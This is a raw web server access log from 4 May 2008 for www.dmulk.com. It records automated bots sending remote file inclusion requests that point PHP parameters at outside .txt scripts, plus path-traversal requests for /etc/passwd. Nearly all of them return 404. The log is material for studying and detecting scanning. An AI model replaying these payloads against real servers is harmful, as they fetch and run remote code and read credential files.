87.106.16.18 - - [04/May/2008:09:08:19 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:19 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:19 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:08:20 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:22 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:28 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:09:08:29 -0700] "GET /logs//presse.php?do=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:09:08:30 -0700] "GET //presse.php?do=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:08:46 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:48 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:09:08:50 -0700] "GET //display.php?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:51 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:51 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:09:04 -0700] "GET /logs/access_071219.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:09:05 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:09:05 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:09:16 -0700] "GET /logs/access_080309.log/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:09:16 -0700] "GET /inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:09:17 -0700] "GET /logs/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:09:20 -0700] "GET /logs/access_071212.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:09:22 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:09:37 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:09:38 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:09:38 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:09:45 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:10:02 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:10:02 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:10:03 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:10:05 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:09:10:25 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [04/May/2008:09:10:26 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [04/May/2008:09:10:27 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:10:40 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:10:40 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:10:40 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:10:41 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:10:42 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:10:42 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:10:49 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:10:56 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:10:56 -0700] "GET /convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:10:56 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:11:05 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:11:05 -0700] "GET /convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:11:05 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:15 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:21 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:30 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:30 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:11:34 -0700] "GET /logs/access_080215.log/convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:11:38 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.145.85 - - [04/May/2008:09:11:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.25.145.85 - - [04/May/2008:09:11:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:11:56 -0700] "GET /logs/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:11:57 -0700] "GET /inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:09:11:58 -0700] "GET /logs/access_080218.log/@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:59 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:09:11:59 -0700] "GET /logs/access_080218.log/@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:11:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:12:00 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:12:05 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:12:07 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:12:08 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:12:08 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:12:23 -0700] "GET /extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:12:33 -0700] "GET //index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:09:12:42 -0700] "GET /caster/admin/addons/archive/archive.php?adminfolder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:09:12:42 -0700] "GET /logs/caster/admin/addons/archive/archive.php?adminfolder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:13:00 -0700] "GET /logs/access_080218.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:13:03 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:13:04 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:13:05 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:13:06 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:13:06 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:13:15 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:13:34 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:13:34 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:13:42 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:14:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:14:09 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:14:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:14:13 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:14:14 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:14:33 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:14:39 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.dmulk.com"
87.106.11.23 - - [04/May/2008:09:14:55 -0700] "GET /logs/access_071216.log//spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.11.23 - - [04/May/2008:09:14:56 -0700] "GET //spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.193.54 - - [04/May/2008:09:14:56 -0700] "GET //include.php?path[docroot]=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.11.23 - - [04/May/2008:09:14:58 -0700] "GET /logs//spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:15:01 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
207.58.131.61 - - [04/May/2008:09:15:03 -0700] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:15:08 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:15:23 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
87.106.11.23 - - [04/May/2008:09:15:37 -0700] "GET /logs/access_071218.log//spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:15:42 -0700] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:15:44 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:16:01 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:16:06 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:16:06 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:16:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:16:20 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:16:22 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:16:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:16:23 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
92.226.89.173 - - [04/May/2008:09:16:27 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:16:31 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
